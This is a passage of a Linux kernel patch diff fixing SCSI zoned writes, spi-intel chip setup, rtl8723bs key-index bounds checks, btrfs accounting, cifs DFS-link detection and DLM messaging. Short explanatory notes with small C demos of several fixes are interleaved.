+-	 * Per ZBC and ZAC specifications, writes in sequential write required
+-	 * zones of host-managed devices must be aligned to the device physical
+-	 * block size.
+-	 */
+-	if (blk_queue_zoned_model(q) == BLK_ZONED_HM)
+-		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+-
+ 	sdkp->early_zone_info.nr_zones = nr_zones;
+ 	sdkp->early_zone_info.zone_blocks = zone_blocks;
+ 
+diff --git a/drivers/spi/spi-intel.c b/drivers/spi/spi-intel.c
+index 3ac73691fbb54..54fc226e1cdf6 100644
+--- a/drivers/spi/spi-intel.c
++++ b/drivers/spi/spi-intel.c
+@@ -1366,14 +1366,14 @@ static int intel_spi_populate_chip(struct intel_spi *ispi)
+ 	if (!spi_new_device(ispi->master, &chip))
+ 		return -ENODEV;
+ 
+-	/* Add the second chip if present */
+-	if (ispi->master->num_chipselect < 2)
+-		return 0;
+-
+ 	ret = intel_spi_read_desc(ispi);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Add the second chip if present */
++	if (ispi->master->num_chipselect < 2)
++		return 0;
++
+ 	chip.platform_data = NULL;
+ 	chip.chip_select = 1;
+ 
+diff --git a/drivers/staging/rtl8723bs/include/rtw_security.h b/drivers/staging/rtl8723bs/include/rtw_security.h
+index a68b738584623..7587fa8885274 100644
+--- a/drivers/staging/rtl8723bs/include/rtw_security.h
++++ b/drivers/staging/rtl8723bs/include/rtw_security.h
+@@ -107,13 +107,13 @@ struct security_priv {
+ 
+ 	u32 dot118021XGrpPrivacy;	/*  This specify the privacy algthm. used for Grp key */
+ 	u32 dot118021XGrpKeyid;		/*  key id used for Grp Key (tx key index) */
+-	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID];	/*  802.1x Group Key, for inx0 and inx1 */
+-	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID];
+-	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID];
++	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID + 1];	/*  802.1x Group Key, for inx0 and inx1 */
++	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID + 1];
++	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID + 1];
+ 	union pn48		dot11Grptxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11Grprxpn;			/*  PN48 used for Grp Key recv. */
+ 	u32 dot11wBIPKeyid;						/*  key id used for BIP Key (tx key index) */
+-	union Keytype	dot11wBIPKey[6];		/*  BIP Key, for index4 and index5 */
++	union Keytype	dot11wBIPKey[BIP_MAX_KEYID + 1];	/*  BIP Key, for index4 and index5 */
+ 	union pn48		dot11wBIPtxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11wBIPrxpn;			/*  PN48 used for Grp Key recv. */
+ 
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+index 6aeb169c6ebf0..5c738011322fc 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+@@ -350,7 +350,7 @@ int rtw_cfg80211_check_bss(struct adapter *padapter)
+ 	bss = cfg80211_get_bss(padapter->rtw_wdev->wiphy, notify_channel,
+ 			pnetwork->mac_address, pnetwork->ssid.ssid,
+ 			pnetwork->ssid.ssid_length,
+-			WLAN_CAPABILITY_ESS, WLAN_CAPABILITY_ESS);
++			IEEE80211_BSS_TYPE_ANY, IEEE80211_PRIVACY_ANY);
+ 
+ 	cfg80211_put_bss(padapter->rtw_wdev->wiphy, bss);
+ 
+@@ -711,6 +711,7 @@ exit:
+ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+ 	struct mlme_priv *pmlmepriv = &padapter->mlmepriv;
+@@ -724,26 +725,29 @@ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS
+-			|| param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
+ 		ret = -EINVAL;
+ 		goto exit;
+ 	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if ((wep_key_idx >= WEP_KEYS) || (wep_key_len <= 0)) {
++		if (wep_key_len <= 0) {
+ 			ret = -EINVAL;
+ 			goto exit;
+ 		}
+@@ -1135,8 +1139,8 @@ void rtw_cfg80211_unlink_bss(struct adapter *padapter, struct wlan_network *pnet
+ 
+ 	bss = cfg80211_get_bss(wiphy, NULL/*notify_channel*/,
+ 		select_network->mac_address, select_network->ssid.ssid,
+-		select_network->ssid.ssid_length, 0/*WLAN_CAPABILITY_ESS*/,
+-		0/*WLAN_CAPABILITY_ESS*/);
++		select_network->ssid.ssid_length, IEEE80211_BSS_TYPE_ANY,
++		IEEE80211_PRIVACY_ANY);
+ 
+ 	if (bss) {
+ 		cfg80211_unlink_bss(wiphy, bss);
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+index 30374a820496e..40a3157fb7359 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+@@ -46,6 +46,7 @@ static int wpa_set_auth_algs(struct net_device *dev, u32 value)
+ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len, wep_total_len;
+ 	struct ndis_802_11_wep	 *pwep = NULL;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+@@ -60,19 +61,22 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS ||
+-		    param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
+-			ret = -EINVAL;
+-			goto exit;
+-		}
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
++		ret = -EINVAL;
++		goto exit;
++	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+@@ -84,9 +88,6 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if (wep_key_idx > WEP_KEYS)
+-			return -EINVAL;
+-
+ 		if (wep_key_len > 0) {
+ 			wep_key_len = wep_key_len <= 5 ? 5 : 13;
+ 			wep_total_len = wep_key_len + FIELD_OFFSET(struct ndis_802_11_wep, key_material);
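Both rtl8723bs hunks replace a single shared bound with a per-algorithm one: WEP keys and BIP/group keys live in differently sized tables, so the maximum valid index depends on crypt.alg. A compile-and-run sketch of that validation; the WEP_KEYS and BIP_MAX_KEYID values (4 and 5) are mirrored from this driver's headers and are an assumption about this tree.

#include <stdio.h>
#include <string.h>

#define WEP_KEYS	4
#define BIP_MAX_KEYID	5

static int check_key_idx(const char *alg, unsigned int idx)
{
	unsigned int max_idx;

	if (strcmp(alg, "WEP") == 0)
		max_idx = WEP_KEYS - 1;		/* WEP table: indices 0..3 */
	else
		max_idx = BIP_MAX_KEYID;	/* group/BIP table: indices 0..5 */

	if (idx > max_idx) {
		fprintf(stderr, "Error crypt.idx %u > %u\n", idx, max_idx);
		return -1;
	}
	return 0;
}

int main(void)
{
	check_key_idx("WEP", 3);	/* ok */
	check_key_idx("WEP", 5);	/* rejected: beyond the WEP table */
	check_key_idx("BIP", 5);	/* ok: group keys allow index 5 */
	return 0;
}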
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index deebc8ddbd932..4b69945755e4f 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1616,7 +1616,8 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 
+ 		btrfs_info(fs_info,
+ 			"reclaiming chunk %llu with %llu%% used %llu%% unusable",
+-				bg->start, div_u64(bg->used * 100, bg->length),
++				bg->start,
++				div64_u64(bg->used * 100, bg->length),
+ 				div64_u64(zone_unusable * 100, bg->length));
+ 		trace_btrfs_reclaim_block_group(bg);
+ 		ret = btrfs_relocate_chunk(fs_info, bg->start);
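The btrfs hunk swaps div_u64() for div64_u64() because in the kernel div_u64() takes only a 32-bit divisor, and bg->length on a large block group does not fit in 32 bits. A userspace demonstration of the truncation, with stand-in helpers that keep the same parameter widths as the kernel ones.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

static uint64_t div_u64(uint64_t dividend, uint32_t divisor)
{
	return dividend / divisor;	/* divisor is silently truncated by callers */
}

static uint64_t div64_u64(uint64_t dividend, uint64_t divisor)
{
	return dividend / divisor;	/* full 64-bit divisor */
}

int main(void)
{
	uint64_t used = 3ULL << 30;	/* 3 GiB used ... */
	uint64_t length = 6ULL << 30;	/* ... of a 6 GiB block group */

	/* A 6 GiB length pushed through a u32 parameter becomes 2 GiB. */
	printf("truncated: %" PRIu64 "%%\n", div_u64(used * 100, (uint32_t)length));
	printf("correct:   %" PRIu64 "%%\n", div64_u64(used * 100, length));
	return 0;
}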
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 6092a4eedc923..b8ae02aa632e3 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -760,7 +760,13 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 			goto next;
+ 		}
+ 
++		flags = em->flags;
+ 		clear_bit(EXTENT_FLAG_PINNED, &em->flags);
++		/*
++		 * In case we split the extent map, we want to preserve the
++		 * EXTENT_FLAG_LOGGING flag on our extent map, but we don't want
++		 * it on the new extent maps.
++		 */
+ 		clear_bit(EXTENT_FLAG_LOGGING, &flags);
+ 		modified = !list_empty(&em->list);
+ 
+@@ -771,7 +777,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 		if (em->start >= start && em_end <= end)
+ 			goto remove_em;
+ 
+-		flags = em->flags;
+ 		gen = em->generation;
+ 		compressed = test_bit(EXTENT_FLAG_COMPRESSED, &em->flags);
+ 
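The extent-map hunk moves the flags snapshot before the clear_bit() calls, so any split-out maps inherit the original flags minus EXTENT_FLAG_LOGGING while the pinned bit is still dropped from the live map. A generic bit-flag sketch of that ordering; the FLAG_* names are illustrative.

#include <stdio.h>

#define FLAG_PINNED	(1u << 0)
#define FLAG_LOGGING	(1u << 1)

int main(void)
{
	unsigned int em_flags = FLAG_PINNED | FLAG_LOGGING;

	unsigned int flags = em_flags;	/* snapshot first ... */
	em_flags &= ~FLAG_PINNED;	/* ... then mutate the original */
	flags &= ~FLAG_LOGGING;		/* new split maps must not log */

	printf("original keeps LOGGING: %d\n", !!(em_flags & FLAG_LOGGING));
	printf("split maps drop LOGGING: %d\n", !!(flags & FLAG_LOGGING));
	return 0;
}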
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 05f9cbbf6e1ef..f02b8cbd6ec41 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -6739,7 +6739,7 @@ static void btrfs_log_dev_io_error(struct bio *bio, struct btrfs_device *dev)
+ 
+ 	if (btrfs_op(bio) == BTRFS_MAP_WRITE)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_WRITE_ERRS);
+-	if (!(bio->bi_opf & REQ_RAHEAD))
++	else if (!(bio->bi_opf & REQ_RAHEAD))
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_READ_ERRS);
+ 	if (bio->bi_opf & REQ_PREFLUSH)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_FLUSH_ERRS);
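Turning the read-error branch into an else-if means a failed write is counted once, not as both a write and a read error, while flush accounting stays independent. A small runnable sketch of the corrected accounting; the REQ_* values and struct stats are invented for the demo.

#include <stdbool.h>
#include <stdio.h>

#define REQ_RAHEAD	(1u << 0)
#define REQ_PREFLUSH	(1u << 1)

struct stats { int write_errs, read_errs, flush_errs; };

static void log_io_error(struct stats *s, bool is_write, unsigned int opf)
{
	if (is_write)
		s->write_errs++;
	else if (!(opf & REQ_RAHEAD))	/* a plain read failed */
		s->read_errs++;
	if (opf & REQ_PREFLUSH)
		s->flush_errs++;
}

int main(void)
{
	struct stats s = {0};

	log_io_error(&s, true, 0);		/* write error: no read count */
	log_io_error(&s, false, REQ_RAHEAD);	/* readahead failure: ignored */
	printf("w=%d r=%d f=%d\n", s.write_errs, s.read_errs, s.flush_errs);
	return 0;
}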
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index eb1a0de9dd553..bc4475f6c0827 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -664,11 +664,21 @@ static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+ int match_target_ip(struct TCP_Server_Info *server,
+ 		    const char *share, size_t share_len,
+ 		    bool *result);
+-
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *dfs_link_path);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
+ #endif
+ 
+ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 062175994e879..4e54736a06996 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -21,6 +21,7 @@
+ #include "cifsfs.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
++#include "dfs_cache.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -1314,4 +1315,70 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with a
++ * STATUS_OBJECT_NAME_INVALID code to an SMB2 QUERY_INFO request for
++ * a "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname>
++ * contains non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has a prefix path, so attempt
++	 * to get a referral to figure out whether it is a DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end up filling all the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
+ #endif
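The cifsproto.h hunk pairs the new helper with an inline stub for kernels built without CONFIG_CIFS_DFS_UPCALL, so callers need no #ifdefs of their own. A minimal sketch of that compile-out pattern; CONFIG_FEATURE and probe_link are placeholders, not cifs names.

#include <stdbool.h>
#include <stdio.h>

#ifdef CONFIG_FEATURE
int probe_link(const char *path, bool *islink);	/* real implementation elsewhere */
#else
static inline int probe_link(const char *path, bool *islink)
{
	(void)path;
	*islink = false;	/* feature compiled out: never a link */
	return 0;
}
#endif

int main(void)
{
	bool islink;

	if (!probe_link("/share/dir", &islink))
		printf("islink=%d\n", islink);	/* callers stay #ifdef-free */
	return 0;
}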
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index e1491440e8f1f..442718cf61b86 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -511,12 +511,13 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			 struct cifs_sb_info *cifs_sb, const char *full_path,
+ 			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+ {
+-	int rc;
+ 	__u32 create_options = 0;
+ 	struct cifsFileInfo *cfile;
+ 	struct cached_fid *cfid = NULL;
+ 	struct kvec err_iov[3] = {};
+ 	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
+ 
+ 	*adjust_tz = false;
+ 	*reparse = false;
+@@ -563,15 +564,15 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 					      create_options, ACL_NO_MODE, data,
+ 					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
+ 			goto out;
+-		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			/*
+-			 * Handle weird Windows SMB server behaviour. It responds with
+-			 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-			 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-			 * where <dfsname> contains non-ASCII unicode symbols.
+-			 */
+-			rc = -EREMOTE;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
+ 		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 6da495f593e17..0424876d22e5a 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -796,7 +796,6 @@ static int
+ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 			struct cifs_sb_info *cifs_sb, const char *full_path)
+ {
+-	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	int err_buftype = CIFS_NO_BUFFER;
+@@ -804,6 +803,8 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
+ 
+ 	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+ 	if (!rc) {
+@@ -833,15 +834,17 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+ 			goto out;
+-		/*
+-		 * Handle weird Windows SMB server behaviour. It responds with
+-		 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-		 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-		 * where <dfsname> contains non-ASCII unicode symbols.
+-		 */
+-		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
+-			rc = -EREMOTE;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+ 			rc = -EOPNOTSUPP;
+diff --git a/fs/dlm/lock.c b/fs/dlm/lock.c
+index 94a72ede57646..0b1bc24536ceb 100644
+--- a/fs/dlm/lock.c
++++ b/fs/dlm/lock.c
+@@ -3611,9 +3611,10 @@ static int create_message(struct dlm_rsb *r, struct dlm_lkb *lkb,
+ /* further lowcomms enhancements or alternate implementations may make
+    the return value from this function useful at some point */
+ 
+-static int send_message(struct dlm_mhandle *mh, struct dlm_message *ms)
++static int send_message(struct dlm_mhandle *mh, struct dlm_message *ms,
++			const void *name, int namelen)
+ {
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, name, namelen);
+ 	return 0;
+ }
+ 
+@@ -3679,7 +3680,7 @@ static int send_common(struct dlm_rsb *r, struct dlm_lkb *lkb, int mstype)
+ 
+ 	send_args(r, lkb, ms);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+ 	if (error)
+ 		goto fail;
+ 	return 0;
+@@ -3742,7 +3743,7 @@ static int send_grant(struct dlm_rsb *r, struct dlm_lkb *lkb)
+ 
+ 	ms->m_result = 0;
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3763,7 +3764,7 @@ static int send_bast(struct dlm_rsb *r, struct dlm_lkb *lkb, int mode)
+ 
+ 	ms->m_bastmode = cpu_to_le32(mode);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3786,7 +3787,7 @@ static int send_lookup(struct dlm_rsb *r, struct dlm_lkb *lkb)
+ 
+ 	send_args(r, lkb, ms);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+ 	if (error)
+ 		goto fail;
+ 	return 0;
+@@ -3811,7 +3812,7 @@ static int send_remove(struct dlm_rsb *r)
+ 	memcpy(ms->m_extra, r->res_name, r->res_length);
+ 	ms->m_hash = cpu_to_le32(r->res_hash);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3833,7 +3834,7 @@ static int send_common_reply(struct dlm_rsb *r, struct dlm_lkb *lkb,
+ 
+ 	ms->m_result = cpu_to_le32(to_dlm_errno(rv));
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3874,7 +3875,7 @@ static int send_lookup_reply(struct dlm_ls *ls, struct dlm_message *ms_in,
+ 	ms->m_result = cpu_to_le32(to_dlm_errno(rv));
+ 	ms->m_nodeid = cpu_to_le32(ret_nodeid);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, ms_in->m_extra, receive_extralen(ms_in));
+  out:
+ 	return error;
+ }
+@@ -4044,66 +4045,6 @@ out:
+ 	return error;
+ }
+ 
+-static void send_repeat_remove(struct dlm_ls *ls, char *ms_name, int len)
+-{
+-	char name[DLM_RESNAME_MAXLEN + 1];
+-	struct dlm_message *ms;
+-	struct dlm_mhandle *mh;
+-	struct dlm_rsb *r;
+-	uint32_t hash, b;
+-	int rv, dir_nodeid;
+-
+-	memset(name, 0, sizeof(name));
+-	memcpy(name, ms_name, len);
+-
+-	hash = jhash(name, len, 0);
+-	b = hash & (ls->ls_rsbtbl_size - 1);
+-
+-	dir_nodeid = dlm_hash2nodeid(ls, hash);
+-
+-	log_error(ls, "send_repeat_remove dir %d %s", dir_nodeid, name);
+-
+-	spin_lock(&ls->ls_rsbtbl[b].lock);
+-	rv = dlm_search_rsb_tree(&ls->ls_rsbtbl[b].keep, name, len, &r);
+-	if (!rv) {
+-		spin_unlock(&ls->ls_rsbtbl[b].lock);
+-		log_error(ls, "repeat_remove on keep %s", name);
+-		return;
+-	}
+-
+-	rv = dlm_search_rsb_tree(&ls->ls_rsbtbl[b].toss, name, len, &r);
+-	if (!rv) {
+-		spin_unlock(&ls->ls_rsbtbl[b].lock);
+-		log_error(ls, "repeat_remove on toss %s", name);
+-		return;
+-	}
+-
+-	/* use ls->remove_name2 to avoid conflict with shrink? */
+-
+-	spin_lock(&ls->ls_remove_spin);
+-	ls->ls_remove_len = len;
+-	memcpy(ls->ls_remove_name, name, DLM_RESNAME_MAXLEN);
+-	spin_unlock(&ls->ls_remove_spin);
+-	spin_unlock(&ls->ls_rsbtbl[b].lock);
+-
+-	rv = _create_message(ls, sizeof(struct dlm_message) + len,
+-			     dir_nodeid, DLM_MSG_REMOVE, &ms, &mh);
+-	if (rv)
+-		goto out;
+-
+-	memcpy(ms->m_extra, name, len);
+-	ms->m_hash = cpu_to_le32(hash);
+-
+-	send_message(mh, ms);
+-
+-out:
+-	spin_lock(&ls->ls_remove_spin);
+-	ls->ls_remove_len = 0;
+-	memset(ls->ls_remove_name, 0, DLM_RESNAME_MAXLEN);
+-	spin_unlock(&ls->ls_remove_spin);
+-	wake_up(&ls->ls_remove_wait);
+-}
+-
+ static int receive_request(struct dlm_ls *ls, struct dlm_message *ms)
+ {
+ 	struct dlm_lkb *lkb;
+@@ -4173,25 +4114,11 @@ static int receive_request(struct dlm_ls *ls, struct dlm_message *ms)
+ 	   ENOTBLK request failures when the lookup reply designating us
+ 	   as master is delayed. */
+ 
+-	/* We could repeatedly return -EBADR here if our send_remove() is
+-	   delayed in being sent/arriving/being processed on the dir node.
+-	   Another node would repeatedly lookup up the master, and the dir
+-	   node would continue returning our nodeid until our send_remove
+-	   took effect.
+-
+-	   We send another remove message in case our previous send_remove
+-	   was lost/ignored/missed somehow. */
+-
+ 	if (error != -ENOTBLK) {
+ 		log_limit(ls, "receive_request %x from %d %d",
+ 			  le32_to_cpu(ms->m_lkid), from_nodeid, error);
+ 	}
+ 
+-	if (namelen && error == -EBADR) {
+-		send_repeat_remove(ls, ms->m_extra, namelen);
+-		msleep(1000);
+-	}
+-
+ 	setup_stub_lkb(ls, ms);
+ 	send_request_reply(&ls->ls_stub_rsb, &ls->ls_stub_lkb, error);
+ 	return error;
+@@ -6374,7 +6301,7 @@ static int send_purge(struct dlm_ls *ls, int nodeid, int pid)
+ 	ms->m_nodeid = cpu_to_le32(nodeid);
+ 	ms->m_pid = cpu_to_le32(pid);
+ 
+-	return send_message(mh, ms);
++	return send_message(mh, ms, NULL, 0);
+ }
+ 
+ int dlm_user_purge(struct dlm_ls *ls, struct dlm_user_proc *proc,
